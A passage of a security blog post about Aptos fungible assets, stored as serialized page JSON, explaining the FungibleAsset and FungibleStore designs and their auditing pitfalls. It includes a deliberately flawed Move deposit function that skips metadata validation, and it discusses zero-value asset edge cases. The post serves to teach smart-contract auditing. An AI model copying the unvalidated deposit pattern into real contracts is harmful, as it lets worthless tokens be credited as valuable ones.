",{"type":24,"tag":188,"props":68158,"children":68161},{"href":68159,"rel":68160},"https://github.com/aptos-foundation/AIPs/blob/ac3da48db226cf2dbaf4df6f1f5109a4f1b2e604/aips/aip-21.md",[192],[68162],{"type":30,"value":68163},"AIP-21",{"type":30,"value":68165}," summarizes the ",{"type":24,"tag":145,"props":68167,"children":68169},{"className":68168},[],[68170],{"type":30,"value":67646},{"type":30,"value":68172}," problems:",{"type":24,"tag":9770,"props":68174,"children":68175},{},[68176,68185],{"type":24,"tag":32,"props":68177,"children":68178},{},[68179,68183],{"type":24,"tag":301,"props":68180,"children":68181},{},[68182],{"type":30,"value":4054},{"type":30,"value":68184}," coin module has been deemed insufficient for current and future needs due to the rigidity of Move structs and the inherently poor extensibility.",{"type":24,"tag":32,"props":68186,"children":68187},{},[68188],{"type":30,"value":68189},"The existing Coin struct leverages the store ability allowing for assets on-chain to become untraceable. Creating challenges to off-chain observability and on-chain management, such as freezing or burning.",{"type":24,"tag":32,"props":68191,"children":68192},{},[68193],{"type":30,"value":68194},"And declares, that:",{"type":24,"tag":9770,"props":68196,"children":68197},{},[68198],{"type":24,"tag":32,"props":68199,"children":68200},{},[68201],{"type":30,"value":68202},"Fungible assets addresses these issues.",{"type":24,"tag":32,"props":68204,"children":68205},{},[68206],{"type":30,"value":68207},"Let's find out whether this is indeed the case.",{"type":24,"tag":43,"props":68209,"children":68211},{"id":68210},"the-fungible-assets",[68212],{"type":30,"value":68213},"The fungible assets",{"type":24,"tag":32,"props":68215,"children":68216},{},[68217,68219,68225,68227,68234],{"type":30,"value":68218},"Aptos designed fungible assets as a new token standard to solve these problems. A ",{"type":24,"tag":145,"props":68220,"children":68222},{"className":68221},[],[68223],{"type":30,"value":68224},"FungibleAsset",{"type":30,"value":68226}," uses the ",{"type":24,"tag":188,"props":68228,"children":68231},{"href":68229,"rel":68230},"https://medium.com/@borispovod/move-hot-potato-pattern-bbc48a48d93c",[192],[68232],{"type":30,"value":68233},"hot-potato pattern",{"type":30,"value":1679},{"type":24,"tag":291,"props":68236,"children":68238},{"className":9818,"code":68237,"language":9817,"meta":7,"style":7},"struct FungibleAsset {\n metadata: Object\u003CMetadata>,\n amount: u64,\n}\n",[68239],{"type":24,"tag":145,"props":68240,"children":68241},{"__ignoreMap":7},[68242,68258,68288,68308],{"type":24,"tag":301,"props":68243,"children":68244},{"class":303,"line":304},[68245,68249,68254],{"type":24,"tag":301,"props":68246,"children":68247},{"style":348},[68248],{"type":30,"value":3010},{"type":24,"tag":301,"props":68250,"children":68251},{"style":10246},[68252],{"type":30,"value":68253}," FungibleAsset",{"type":24,"tag":301,"props":68255,"children":68256},{"style":359},[68257],{"type":30,"value":3035},{"type":24,"tag":301,"props":68259,"children":68260},{"class":303,"line":320},[68261,68266,68270,68275,68279,68284],{"type":24,"tag":301,"props":68262,"children":68263},{"style":369},[68264],{"type":30,"value":68265}," metadata",{"type":24,"tag":301,"props":68267,"children":68268},{"style":385},[68269],{"type":30,"value":1679},{"type":24,"tag":301,"props":68271,"children":68272},{"style":10246},[68273],{"type":30,"value":68274}," Object",{"type":24,"tag":301,"props":68276,"children":68277},{"style":359},[68278],{"type":30,"value":1849},{"type":24,"tag":301,"props":68280,"children":68281},{"style":10246},[68282],{"type":30,"value":68283},"Metadata",{"type":24,"tag":301,"props":68285,"children":68286},{"style":359},[68287],{"type":30,"value":12957},{"type":24,"tag":301,"props":68289,"children":68290},{"class":303,"line":335},[68291,68296,68300,68304],{"type":24,"tag":301,"props":68292,"children":68293},{"style":369},[68294],{"type":30,"value":68295}," amount",{"type":24,"tag":301,"props":68297,"children":68298},{"style":385},[68299],{"type":30,"value":1679},{"type":24,"tag":301,"props":68301,"children":68302},{"style":10246},[68303],{"type":30,"value":12680},{"type":24,"tag":301,"props":68305,"children":68306},{"style":359},[68307],{"type":30,"value":1729},{"type":24,"tag":301,"props":68309,"children":68310},{"class":303,"line":344},[68311],{"type":24,"tag":301,"props":68312,"children":68313},{"style":359},[68314],{"type":30,"value":698},{"type":24,"tag":32,"props":68316,"children":68317},{},[68318,68320,68325,68326,68331,68333,68338,68340,68347],{"type":30,"value":68319},"Unlike ",{"type":24,"tag":145,"props":68321,"children":68323},{"className":68322},[],[68324],{"type":30,"value":67679},{"type":30,"value":377},{"type":24,"tag":145,"props":68327,"children":68329},{"className":68328},[],[68330],{"type":30,"value":68224},{"type":30,"value":68332}," types are defined at runtime through the ",{"type":24,"tag":145,"props":68334,"children":68336},{"className":68335},[],[68337],{"type":30,"value":68283},{"type":30,"value":68339}," field. This change was meant to ",{"type":24,"tag":188,"props":68341,"children":68344},{"href":68342,"rel":68343},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-21.md#specification",[192],[68345],{"type":30,"value":68346},"enhance extensibility",{"type":30,"value":1679},{"type":24,"tag":9770,"props":68349,"children":68350},{},[68351],{"type":24,"tag":32,"props":68352,"children":68353},{},[68354],{"type":30,"value":68355},"An object can have other resources attached to provide additional context. For example, the metadata could define a gem of a given type, color, quality, and rarity, where ownership indicates the quantity or total weight owned of that type of gem.",{"type":24,"tag":32,"props":68357,"children":68358},{},[68359,68361,68367],{"type":30,"value":68360},"An important implication is that functions accepting ",{"type":24,"tag":145,"props":68362,"children":68364},{"className":68363},[],[68365],{"type":30,"value":68366},"FungibleAssets",{"type":30,"value":68368}," must verify the metadata to ensure valid assets.",{"type":24,"tag":32,"props":68370,"children":68371},{},[68372],{"type":30,"value":68373},"Let's consider a possible implementation of a protocol that takes in assets.",{"type":24,"tag":291,"props":68375,"children":68377},{"className":9818,"code":68376,"language":9817,"meta":7,"style":7},"public fun deposit\u003CT: key>(\n sender: &signer, fa: FungibleAsset\n) acquires [...] {\n assert_not_paused();\n \n let fa_amount = fungible_asset::amount(&fa);\n let sender_address = address_of(sender);\n check_compliance(fa_amount, sender_address);\n \n increase_deposit(get_vault(sender_address), fa_amount);\n \n primary_fungible_store::deposit(global_vault_address(), fa);\n \n event::emit(Deposit {sender_address, fa_amount})\n}\n",[68378],{"type":24,"tag":145,"props":68379,"children":68380},{"__ignoreMap":7},[68381,68418,68456,68480,68492,68499,68544,68578,68608,68615,68652,68659,68697,68704,68750],{"type":24,"tag":301,"props":68382,"children":68383},{"class":303,"line":304},[68384,68389,68393,68398,68402,68406,68410,68414],{"type":24,"tag":301,"props":68385,"children":68386},{"style":369},[68387],{"type":30,"value":68388},"public",{"type":24,"tag":301,"props":68390,"children":68391},{"style":369},[68392],{"type":30,"value":13026},{"type":24,"tag":301,"props":68394,"children":68395},{"style":369},[68396],{"type":30,"value":68397}," deposit",{"type":24,"tag":301,"props":68399,"children":68400},{"style":359},[68401],{"type":30,"value":1849},{"type":24,"tag":301,"props":68403,"children":68404},{"style":10246},[68405],{"type":30,"value":12807},{"type":24,"tag":301,"props":68407,"children":68408},{"style":385},[68409],{"type":30,"value":1679},{"type":24,"tag":301,"props":68411,"children":68412},{"style":369},[68413],{"type":30,"value":12751},{"type":24,"tag":301,"props":68415,"children":68416},{"style":359},[68417],{"type":30,"value":13407},{"type":24,"tag":301,"props":68419,"children":68420},{"class":303,"line":320},[68421,68426,68430,68434,68438,68442,68447,68451],{"type":24,"tag":301,"props":68422,"children":68423},{"style":369},[68424],{"type":30,"value":68425}," sender",{"type":24,"tag":301,"props":68427,"children":68428},{"style":385},[68429],{"type":30,"value":1679},{"type":24,"tag":301,"props":68431,"children":68432},{"style":385},[68433],{"type":30,"value":991},{"type":24,"tag":301,"props":68435,"children":68436},{"style":369},[68437],{"type":30,"value":13963},{"type":24,"tag":301,"props":68439,"children":68440},{"style":359},[68441],{"type":30,"value":377},{"type":24,"tag":301,"props":68443,"children":68444},{"style":369},[68445],{"type":30,"value":68446},"fa",{"type":24,"tag":301,"props":68448,"children":68449},{"style":385},[68450],{"type":30,"value":1679},{"type":24,"tag":301,"props":68452,"children":68453},{"style":10246},[68454],{"type":30,"value":68455}," FungibleAsset\n",{"type":24,"tag":301,"props":68457,"children":68458},{"class":303,"line":335},[68459,68463,68467,68471,68475],{"type":24,"tag":301,"props":68460,"children":68461},{"style":359},[68462],{"type":30,"value":911},{"type":24,"tag":301,"props":68464,"children":68465},{"style":369},[68466],{"type":30,"value":13163},{"type":24,"tag":301,"props":68468,"children":68469},{"style":359},[68470],{"type":30,"value":29800},{"type":24,"tag":301,"props":68472,"children":68473},{"style":385},[68474],{"type":30,"value":4054},{"type":24,"tag":301,"props":68476,"children":68477},{"style":359},[68478],{"type":30,"value":68479},"] {\n",{"type":24,"tag":301,"props":68481,"children":68482},{"class":303,"line":344},[68483,68488],{"type":24,"tag":301,"props":68484,"children":68485},{"style":314},[68486],{"type":30,"value":68487}," assert_not_paused",{"type":24,"tag":301,"props":68489,"children":68490},{"style":359},[68491],{"type":30,"value":4859},{"type":24,"tag":301,"props":68493,"children":68494},{"class":303,"line":401},[68495],{"type":24,"tag":301,"props":68496,"children":68497},{"style":359},[68498],{"type":30,"value":649},{"type":24,"tag":301,"props":68500,"children":68501},{"class":303,"line":415},[68502,68506,68511,68515,68520,68524,68528,68532,68536,68540],{"type":24,"tag":301,"props":68503,"children":68504},{"style":348},[68505],{"type":30,"value":9838},{"type":24,"tag":301,"props":68507,"children":68508},{"style":369},[68509],{"type":30,"value":68510}," fa_amount",{"type":24,"tag":301,"props":68512,"children":68513},{"style":385},[68514],{"type":30,"value":2537},{"type":24,"tag":301,"props":68516,"children":68517},{"style":359},[68518],{"type":30,"value":68519}," fungible_asset",{"type":24,"tag":301,"props":68521,"children":68522},{"style":385},[68523],{"type":30,"value":10308},{"type":24,"tag":301,"props":68525,"children":68526},{"style":314},[68527],{"type":30,"value":27077},{"type":24,"tag":301,"props":68529,"children":68530},{"style":359},[68531],{"type":30,"value":362},{"type":24,"tag":301,"props":68533,"children":68534},{"style":385},[68535],{"type":30,"value":556},{"type":24,"tag":301,"props":68537,"children":68538},{"style":369},[68539],{"type":30,"value":68446},{"type":24,"tag":301,"props":68541,"children":68542},{"style":359},[68543],{"type":30,"value":589},{"type":24,"tag":301,"props":68545,"children":68546},{"class":303,"line":439},[68547,68551,68556,68560,68565,68569,68574],{"type":24,"tag":301,"props":68548,"children":68549},{"style":348},[68550],{"type":30,"value":9838},{"type":24,"tag":301,"props":68552,"children":68553},{"style":369},[68554],{"type":30,"value":68555}," sender_address",{"type":24,"tag":301,"props":68557,"children":68558},{"style":385},[68559],{"type":30,"value":2537},{"type":24,"tag":301,"props":68561,"children":68562},{"style":314},[68563],{"type":30,"value":68564}," address_of",{"type":24,"tag":301,"props":68566,"children":68567},{"style":359},[68568],{"type":30,"value":362},{"type":24,"tag":301,"props":68570,"children":68571},{"style":369},[68572],{"type":30,"value":68573},"sender",{"type":24,"tag":301,"props":68575,"children":68576},{"style":359},[68577],{"type":30,"value":589},{"type":24,"tag":301,"props":68579,"children":68580},{"class":303,"line":447},[68581,68586,68590,68595,68599,68604],{"type":24,"tag":301,"props":68582,"children":68583},{"style":314},[68584],{"type":30,"value":68585}," check_compliance",{"type":24,"tag":301,"props":68587,"children":68588},{"style":359},[68589],{"type":30,"value":362},{"type":24,"tag":301,"props":68591,"children":68592},{"style":369},[68593],{"type":30,"value":68594},"fa_amount",{"type":24,"tag":301,"props":68596,"children":68597},{"style":359},[68598],{"type":30,"value":377},{"type":24,"tag":301,"props":68600,"children":68601},{"style":369},[68602],{"type":30,"value":68603},"sender_address",{"type":24,"tag":301,"props":68605,"children":68606},{"style":359},[68607],{"type":30,"value":589},{"type":24,"tag":301,"props":68609,"children":68610},{"class":303,"line":476},[68611],{"type":24,"tag":301,"props":68612,"children":68613},{"style":359},[68614],{"type":30,"value":649},{"type":24,"tag":301,"props":68616,"children":68617},{"class":303,"line":495},[68618,68623,68627,68632,68636,68640,68644,68648],{"type":24,"tag":301,"props":68619,"children":68620},{"style":314},[68621],{"type":30,"value":68622}," increase_deposit",{"type":24,"tag":301,"props":68624,"children":68625},{"style":359},[68626],{"type":30,"value":362},{"type":24,"tag":301,"props":68628,"children":68629},{"style":314},[68630],{"type":30,"value":68631},"get_vault",{"type":24,"tag":301,"props":68633,"children":68634},{"style":359},[68635],{"type":30,"value":362},{"type":24,"tag":301,"props":68637,"children":68638},{"style":369},[68639],{"type":30,"value":68603},{"type":24,"tag":301,"props":68641,"children":68642},{"style":359},[68643],{"type":30,"value":21967},{"type":24,"tag":301,"props":68645,"children":68646},{"style":369},[68647],{"type":30,"value":68594},{"type":24,"tag":301,"props":68649,"children":68650},{"style":359},[68651],{"type":30,"value":589},{"type":24,"tag":301,"props":68653,"children":68654},{"class":303,"line":504},[68655],{"type":24,"tag":301,"props":68656,"children":68657},{"style":359},[68658],{"type":30,"value":649},{"type":24,"tag":301,"props":68660,"children":68661},{"class":303,"line":512},[68662,68667,68671,68676,68680,68685,68689,68693],{"type":24,"tag":301,"props":68663,"children":68664},{"style":359},[68665],{"type":30,"value":68666}," primary_fungible_store",{"type":24,"tag":301,"props":68668,"children":68669},{"style":385},[68670],{"type":30,"value":10308},{"type":24,"tag":301,"props":68672,"children":68673},{"style":314},[68674],{"type":30,"value":68675},"deposit",{"type":24,"tag":301,"props":68677,"children":68678},{"style":359},[68679],{"type":30,"value":362},{"type":24,"tag":301,"props":68681,"children":68682},{"style":314},[68683],{"type":30,"value":68684},"global_vault_address",{"type":24,"tag":301,"props":68686,"children":68687},{"style":359},[68688],{"type":30,"value":25153},{"type":24,"tag":301,"props":68690,"children":68691},{"style":369},[68692],{"type":30,"value":68446},{"type":24,"tag":301,"props":68694,"children":68695},{"style":359},[68696],{"type":30,"value":589},{"type":24,"tag":301,"props":68698,"children":68699},{"class":303,"line":592},[68700],{"type":24,"tag":301,"props":68701,"children":68702},{"style":359},[68703],{"type":30,"value":649},{"type":24,"tag":301,"props":68705,"children":68706},{"class":303,"line":619},[68707,68712,68716,68721,68725,68730,68734,68738,68742,68746],{"type":24,"tag":301,"props":68708,"children":68709},{"style":359},[68710],{"type":30,"value":68711}," event",{"type":24,"tag":301,"props":68713,"children":68714},{"style":385},[68715],{"type":30,"value":10308},{"type":24,"tag":301,"props":68717,"children":68718},{"style":314},[68719],{"type":30,"value":68720},"emit",{"type":24,"tag":301,"props":68722,"children":68723},{"style":359},[68724],{"type":30,"value":362},{"type":24,"tag":301,"props":68726,"children":68727},{"style":10246},[68728],{"type":30,"value":68729},"Deposit",{"type":24,"tag":301,"props":68731,"children":68732},{"style":359},[68733],{"type":30,"value":51953},{"type":24,"tag":301,"props":68735,"children":68736},{"style":369},[68737],{"type":30,"value":68603},{"type":24,"tag":301,"props":68739,"children":68740},{"style":359},[68741],{"type":30,"value":377},{"type":24,"tag":301,"props":68743,"children":68744},{"style":369},[68745],{"type":30,"value":68594},{"type":24,"tag":301,"props":68747,"children":68748},{"style":359},[68749],{"type":30,"value":39772},{"type":24,"tag":301,"props":68751,"children":68752},{"class":303,"line":635},[68753],{"type":24,"tag":301,"props":68754,"children":68755},{"style":359},[68756],{"type":30,"value":698},{"type":24,"tag":32,"props":68758,"children":68759},{},[68760],{"type":30,"value":68761},"Do you see any problems here? The application does not validate or differentiate fungible assets using their metadata, which causes all fungible asset deposits to be treated as identical.",{"type":24,"tag":32,"props":68763,"children":68764},{},[68765],{"type":30,"value":68766},"While these bugs aren't partiularly complex, they do represent an additional vulnerability class that must be checked for.",{"type":24,"tag":43,"props":68768,"children":68770},{"id":68769},"fungible-stores",[68771],{"type":30,"value":68772},"Fungible stores",{"type":24,"tag":32,"props":68774,"children":68775},{},[68776],{"type":30,"value":68777},"As mentioned, fungible assets are hot potatoes, meaning they must be destroyed after each transaction. If they lack abilities, how can they be used?",{"type":24,"tag":32,"props":68779,"children":68780},{},[68781,68783,68789],{"type":30,"value":68782},"Meet the ",{"type":24,"tag":145,"props":68784,"children":68786},{"className":68785},[],[68787],{"type":30,"value":68788},"FungibleStore",{"type":30,"value":206},{"type":24,"tag":291,"props":68791,"children":68793},{"className":9818,"code":68792,"language":9817,"meta":7,"style":7},"struct FungibleStore has key {\n metadata: Object\u003CMetadata>,\n balance: u64,\n frozen: bool,\n}\n",[68794],{"type":24,"tag":145,"props":68795,"children":68796},{"__ignoreMap":7},[68797,68821,68848,68868,68887],{"type":24,"tag":301,"props":68798,"children":68799},{"class":303,"line":304},[68800,68804,68809,68813,68817],{"type":24,"tag":301,"props":68801,"children":68802},{"style":348},[68803],{"type":30,"value":3010},{"type":24,"tag":301,"props":68805,"children":68806},{"style":10246},[68807],{"type":30,"value":68808}," FungibleStore",{"type":24,"tag":301,"props":68810,"children":68811},{"style":369},[68812],{"type":30,"value":16216},{"type":24,"tag":301,"props":68814,"children":68815},{"style":369},[68816],{"type":30,"value":12751},{"type":24,"tag":301,"props":68818,"children":68819},{"style":359},[68820],{"type":30,"value":3035},{"type":24,"tag":301,"props":68822,"children":68823},{"class":303,"line":320},[68824,68828,68832,68836,68840,68844],{"type":24,"tag":301,"props":68825,"children":68826},{"style":369},[68827],{"type":30,"value":68265},{"type":24,"tag":301,"props":68829,"children":68830},{"style":385},[68831],{"type":30,"value":1679},{"type":24,"tag":301,"props":68833,"children":68834},{"style":10246},[68835],{"type":30,"value":68274},{"type":24,"tag":301,"props":68837,"children":68838},{"style":359},[68839],{"type":30,"value":1849},{"type":24,"tag":301,"props":68841,"children":68842},{"style":10246},[68843],{"type":30,"value":68283},{"type":24,"tag":301,"props":68845,"children":68846},{"style":359},[68847],{"type":30,"value":12957},{"type":24,"tag":301,"props":68849,"children":68850},{"class":303,"line":335},[68851,68856,68860,68864],{"type":24,"tag":301,"props":68852,"children":68853},{"style":369},[68854],{"type":30,"value":68855}," balance",{"type":24,"tag":301,"props":68857,"children":68858},{"style":385},[68859],{"type":30,"value":1679},{"type":24,"tag":301,"props":68861,"children":68862},{"style":10246},[68863],{"type":30,"value":12680},{"type":24,"tag":301,"props":68865,"children":68866},{"style":359},[68867],{"type":30,"value":1729},{"type":24,"tag":301,"props":68869,"children":68870},{"class":303,"line":344},[68871,68875,68879,68883],{"type":24,"tag":301,"props":68872,"children":68873},{"style":369},[68874],{"type":30,"value":67926},{"type":24,"tag":301,"props":68876,"children":68877},{"style":385},[68878],{"type":30,"value":1679},{"type":24,"tag":301,"props":68880,"children":68881},{"style":10246},[68882],{"type":30,"value":18848},{"type":24,"tag":301,"props":68884,"children":68885},{"style":359},[68886],{"type":30,"value":1729},{"type":24,"tag":301,"props":68888,"children":68889},{"class":303,"line":401},[68890],{"type":24,"tag":301,"props":68891,"children":68892},{"style":359},[68893],{"type":30,"value":698},{"type":24,"tag":32,"props":68895,"children":68896},{},[68897,68902,68904,68909,68911,68916,68918,68923,68925,68930],{"type":24,"tag":145,"props":68898,"children":68900},{"className":68899},[],[68901],{"type":30,"value":68788},{"type":30,"value":68903}," manages balances and metadata instead of holding the actual ",{"type":24,"tag":145,"props":68905,"children":68907},{"className":68906},[],[68908],{"type":30,"value":68224},{"type":30,"value":68910}," (it can't because ",{"type":24,"tag":145,"props":68912,"children":68914},{"className":68913},[],[68915],{"type":30,"value":68224},{"type":30,"value":68917}," doesn't have ",{"type":24,"tag":145,"props":68919,"children":68921},{"className":68920},[],[68922],{"type":30,"value":12760},{"type":30,"value":68924},"). Withdrawals create temporary ",{"type":24,"tag":145,"props":68926,"children":68928},{"className":68927},[],[68929],{"type":30,"value":68224},{"type":30,"value":68931}," resources, while deposits destroy them and update the balance. This design prevents freezing bypasses and improves observability.",{"type":24,"tag":2719,"props":68933,"children":68934},{},[],{"type":24,"tag":32,"props":68936,"children":68937},{},[68938,68940,68945,68947,68952],{"type":30,"value":68939},"A curious reader might wonder, is there any other way to create or destroy a ",{"type":24,"tag":145,"props":68941,"children":68943},{"className":68942},[],[68944],{"type":30,"value":68224},{"type":30,"value":68946}," besides withdrawing, depositing or minting it? There is — anyone can create and destroy a zero-value ",{"type":24,"tag":145,"props":68948,"children":68950},{"className":68949},[],[68951],{"type":30,"value":68224},{"type":30,"value":206},{"type":24,"tag":291,"props":68954,"children":68956},{"className":9818,"code":68955,"language":9817,"meta":7,"style":7},"public fun destroy_zero(fungible_asset: FungibleAsset) {\n let FungibleAsset { amount, metadata: _ } = fungible_asset;\n assert!(amount == 0, error::invalid_argument(EAMOUNT_IS_NOT_ZERO));\n}\n\npublic fun zero\u003CT: key>(metadata: Object\u003CT>): FungibleAsset {\n FungibleAsset {\n metadata: object::convert(metadata),\n amount: 0,\n }\n}\n",[68957],{"type":24,"tag":145,"props":68958,"children":68959},{"__ignoreMap":7},[68960,68997,69049,69092,69099,69106,69178,69190,69228,69247,69254],{"type":24,"tag":301,"props":68961,"children":68962},{"class":303,"line":304},[68963,68967,68971,68976,68980,68985,68989,68993],{"type":24,"tag":301,"props":68964,"children":68965},{"style":369},[68966],{"type":30,"value":68388},{"type":24,"tag":301,"props":68968,"children":68969},{"style":369},[68970],{"type":30,"value":13026},{"type":24,"tag":301,"props":68972,"children":68973},{"style":314},[68974],{"type":30,"value":68975}," destroy_zero",{"type":24,"tag":301,"props":68977,"children":68978},{"style":359},[68979],{"type":30,"value":362},{"type":24,"tag":301,"props":68981,"children":68982},{"style":369},[68983],{"type":30,"value":68984},"fungible_asset",{"type":24,"tag":301,"props":68986,"children":68987},{"style":385},[68988],{"type":30,"value":1679},{"type":24,"tag":301,"props":68990,"children":68991},{"style":10246},[68992],{"type":30,"value":68253},{"type":24,"tag":301,"props":68994,"children":68995},{"style":359},[68996],{"type":30,"value":398},{"type":24,"tag":301,"props":68998,"children":68999},{"class":303,"line":320},[69000,69004,69008,69012,69016,69020,69025,69029,69033,69037,69041,69045],{"type":24,"tag":301,"props":69001,"children":69002},{"style":348},[69003],{"type":30,"value":9838},{"type":24,"tag":301,"props":69005,"children":69006},{"style":10246},[69007],{"type":30,"value":68253},{"type":24,"tag":301,"props":69009,"children":69010},{"style":359},[69011],{"type":30,"value":16392},{"type":24,"tag":301,"props":69013,"children":69014},{"style":369},[69015],{"type":30,"value":27077},{"type":24,"tag":301,"props":69017,"children":69018},{"style":359},[69019],{"type":30,"value":377},{"type":24,"tag":301,"props":69021,"children":69022},{"style":369},[69023],{"type":30,"value":69024},"metadata",{"type":24,"tag":301,"props":69026,"children":69027},{"style":385},[69028],{"type":30,"value":1679},{"type":24,"tag":301,"props":69030,"children":69031},{"style":369},[69032],{"type":30,"value":9873},{"type":24,"tag":301,"props":69034,"children":69035},{"style":359},[69036],{"type":30,"value":42945},{"type":24,"tag":301,"props":69038,"children":69039},{"style":385},[69040],{"type":30,"value":523},{"type":24,"tag":301,"props":69042,"children":69043},{"style":369},[69044],{"type":30,"value":68519},{"type":24,"tag":301,"props":69046,"children":69047},{"style":359},[69048],{"type":30,"value":492},{"type":24,"tag":301,"props":69050,"children":69051},{"class":303,"line":335},[69052,69057,69061,69065,69069,69073,69078,69082,69087],{"type":24,"tag":301,"props":69053,"children":69054},{"style":314},[69055],{"type":30,"value":69056}," assert!",{"type":24,"tag":301,"props":69058,"children":69059},{"style":359},[69060],{"type":30,"value":362},{"type":24,"tag":301,"props":69062,"children":69063},{"style":369},[69064],{"type":30,"value":27077},{"type":24,"tag":301,"props":69066,"children":69067},{"style":385},[69068],{"type":30,"value":2460},{"type":24,"tag":301,"props":69070,"children":69071},{"style":466},[69072],{"type":30,"value":685},{"type":24,"tag":301,"props":69074,"children":69075},{"style":359},[69076],{"type":30,"value":69077},", error",{"type":24,"tag":301,"props":69079,"children":69080},{"style":385},[69081],{"type":30,"value":10308},{"type":24,"tag":301,"props":69083,"children":69084},{"style":314},[69085],{"type":30,"value":69086},"invalid_argument",{"type":24,"tag":301,"props":69088,"children":69089},{"style":359},[69090],{"type":30,"value":69091},"(EAMOUNT_IS_NOT_ZERO));\n",{"type":24,"tag":301,"props":69093,"children":69094},{"class":303,"line":344},[69095],{"type":24,"tag":301,"props":69096,"children":69097},{"style":359},[69098],{"type":30,"value":698},{"type":24,"tag":301,"props":69100,"children":69101},{"class":303,"line":401},[69102],{"type":24,"tag":301,"props":69103,"children":69104},{"emptyLinePlaceholder":16},[69105],{"type":30,"value":341},{"type":24,"tag":301,"props":69107,"children":69108},{"class":303,"line":415},[69109,69113,69117,69122,69126,69130,69134,69138,69142,69146,69150,69154,69158,69162,69166,69170,69174],{"type":24,"tag":301,"props":69110,"children":69111},{"style":369},[69112],{"type":30,"value":68388},{"type":24,"tag":301,"props":69114,"children":69115},{"style":369},[69116],{"type":30,"value":13026},{"type":24,"tag":301,"props":69118,"children":69119},{"style":369},[69120],{"type":30,"value":69121}," zero",{"type":24,"tag":301,"props":69123,"children":69124},{"style":359},[69125],{"type":30,"value":1849},{"type":24,"tag":301,"props":69127,"children":69128},{"style":10246},[69129],{"type":30,"value":12807},{"type":24,"tag":301,"props":69131,"children":69132},{"style":385},[69133],{"type":30,"value":1679},{"type":24,"tag":301,"props":69135,"children":69136},{"style":369},[69137],{"type":30,"value":12751},{"type":24,"tag":301,"props":69139,"children":69140},{"style":359},[69141],{"type":30,"value":14426},{"type":24,"tag":301,"props":69143,"children":69144},{"style":369},[69145],{"type":30,"value":69024},{"type":24,"tag":301,"props":69147,"children":69148},{"style":385},[69149],{"type":30,"value":1679},{"type":24,"tag":301,"props":69151,"children":69152},{"style":10246},[69153],{"type":30,"value":68274},{"type":24,"tag":301,"props":69155,"children":69156},{"style":359},[69157],{"type":30,"value":1849},{"type":24,"tag":301,"props":69159,"children":69160},{"style":10246},[69161],{"type":30,"value":12807},{"type":24,"tag":301,"props":69163,"children":69164},{"style":359},[69165],{"type":30,"value":15203},{"type":24,"tag":301,"props":69167,"children":69168},{"style":385},[69169],{"type":30,"value":1679},{"type":24,"tag":301,"props":69171,"children":69172},{"style":10246},[69173],{"type":30,"value":68253},{"type":24,"tag":301,"props":69175,"children":69176},{"style":359},[69177],{"type":30,"value":3035},{"type":24,"tag":301,"props":69179,"children":69180},{"class":303,"line":439},[69181,69186],{"type":24,"tag":301,"props":69182,"children":69183},{"style":10246},[69184],{"type":30,"value":69185}," FungibleAsset",{"type":24,"tag":301,"props":69187,"children":69188},{"style":359},[69189],{"type":30,"value":3035},{"type":24,"tag":301,"props":69191,"children":69192},{"class":303,"line":447},[69193,69198,69202,69207,69211,69216,69220,69224],{"type":24,"tag":301,"props":69194,"children":69195},{"style":369},[69196],{"type":30,"value":69197}," metadata",{"type":24,"tag":301,"props":69199,"children":69200},{"style":385},[69201],{"type":30,"value":1679},{"type":24,"tag":301,"props":69203,"children":69204},{"style":359},[69205],{"type":30,"value":69206}," object",{"type":24,"tag":301,"props":69208,"children":69209},{"style":385},[69210],{"type":30,"value":10308},{"type":24,"tag":301,"props":69212,"children":69213},{"style":314},[69214],{"type":30,"value":69215},"convert",{"type":24,"tag":301,"props":69217,"children":69218},{"style":359},[69219],{"type":30,"value":362},{"type":24,"tag":301,"props":69221,"children":69222},{"style":369},[69223],{"type":30,"value":69024},{"type":24,"tag":301,"props":69225,"children":69226},{"style":359},[69227],{"type":30,"value":4656},{"type":24,"tag":301,"props":69229,"children":69230},{"class":303,"line":476},[69231,69235,69239,69243],{"type":24,"tag":301,"props":69232,"children":69233},{"style":369},[69234],{"type":30,"value":14265},{"type":24,"tag":301,"props":69236,"children":69237},{"style":385},[69238],{"type":30,"value":1679},{"type":24,"tag":301,"props":69240,"children":69241},{"style":466},[69242],{"type":30,"value":685},{"type":24,"tag":301,"props":69244,"children":69245},{"style":359},[69246],{"type":30,"value":1729},{"type":24,"tag":301,"props":69248,"children":69249},{"class":303,"line":495},[69250],{"type":24,"tag":301,"props":69251,"children":69252},{"style":359},[69253],{"type":30,"value":501},{"type":24,"tag":301,"props":69255,"children":69256},{"class":303,"line":504},[69257],{"type":24,"tag":301,"props":69258,"children":69259},{"style":359},[69260],{"type":30,"value":698},{"type":24,"tag":32,"props":69262,"children":69263},{},[69264],{"type":30,"value":69265},"In theory, this shouldn’t pose a problem. After all, having zero of something doesn’t exactly qualify as ownership.",{"type":24,"tag":32,"props":69267,"children":69268},{},[69269,69271,69276],{"type":30,"value":69270},"In practice, the ability to freely mint and burn zero ",{"type":24,"tag":145,"props":69272,"children":69274},{"className":69273},[],[69275],{"type":30,"value":68366},{"type":30,"value":69277}," of any type could present a significant risk. During our reviews, we enountered many protocols that did not account for this possibility, leading to arithmetic errors, DoS logic bugs or inaccurate calculations. Keep in mind that edge case, we'll come back to this.",{"type":24,"tag":80,"props":69279,"children":69281},{"id":69280},"primary-and-secondary-stores",[69282],{"type":30,"value":69283},"Primary and secondary stores",{"type":24,"tag":32,"props":69285,"children":69286},{},[69287,69293,69295,69301,69303,69308],{"type":24,"tag":145,"props":69288,"children":69290},{"className":69289},[],[69291],{"type":30,"value":69292},"FungibleStores",{"type":30,"value":69294}," in comparison to ",{"type":24,"tag":145,"props":69296,"children":69298},{"className":69297},[],[69299],{"type":30,"value":69300},"CoinStores",{"type":30,"value":69302}," are not unique. Each user can have multiple ",{"type":24,"tag":145,"props":69304,"children":69306},{"className":69305},[],[69307],{"type":30,"value":68788},{"type":30,"value":69309}," objects for a given token!",{"type":24,"tag":32,"props":69311,"children":69312},{},[69313,69315,69322,69324,69329],{"type":30,"value":69314},"A primary fungible store is maintained via the aptly named ",{"type":24,"tag":188,"props":69316,"children":69319},{"href":69317,"rel":69318},"https://github.com/aptos-labs/aptos-core/blob/2bea962eac4743db6cc0ae2e8a2fd7fcc323b121/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move",[192],[69320],{"type":30,"value":69321},"primary_fungible_store",{"type":30,"value":69323}," module. It's \"primary\" because of its deterministic location, which is calculated using the owner and the fungible asset's ",{"type":24,"tag":145,"props":69325,"children":69327},{"className":69326},[],[69328],{"type":30,"value":68283},{"type":30,"value":69330}," addresses. Users can also create a number of 